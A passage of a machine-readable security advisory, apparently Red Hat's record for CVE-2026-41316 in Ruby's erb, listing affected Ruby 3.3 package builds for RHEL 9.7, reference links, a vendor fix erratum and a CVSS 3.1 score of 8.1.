"AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-41316"
},
{
"category": "external",
"summary": "RHBZ#2461369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-41316",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41316"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41316"
},
{
"category": "external",
"summary": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv",
"url": "https://github.com/ruby/erb/security/advisories/GHSA-q339-8rmv-2mhv"
}
],
"release_date": "2026-04-24T02:35:41.160000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-18T13:12:43+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bundler-0:2.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-io-console-debuginfo-0:0.7.1-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-irb-0:1.13.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-json-debuginfo-0:2.7.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-minitest-0:5.20.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debuginfo-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-debugsource-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-mysql2-doc-0:0.5.5-3.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debuginfo-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-debugsource-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-pg-doc-0:1.5.4-2.module+el9.7.0+24119+ccc80daf.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-power_assert-0:2.0.3-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-psych-debuginfo-0:5.1.2-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-racc-debuginfo-0:1.7.3-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rake-0:13.1.0-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rbs-debuginfo-0:3.4.0-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rdoc-0:6.6.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rexml-0:3.4.4-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-rss-0:0.3.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-test-unit-0:3.6.1-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-typeprof-0:0.21.9-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygems-devel-0:3.5.22-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:18030"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.src::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-bundled-gems-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.3.10-6.module+el9.7.0+24248+66578cbb.noarch::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.3.10-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.aarch64::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.i686::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.ppc64le::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.s390x::ruby:3.3",
"AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.1.5-6.module+el9.7.0+24248+66578cbb.x86_64::ruby:3.3",
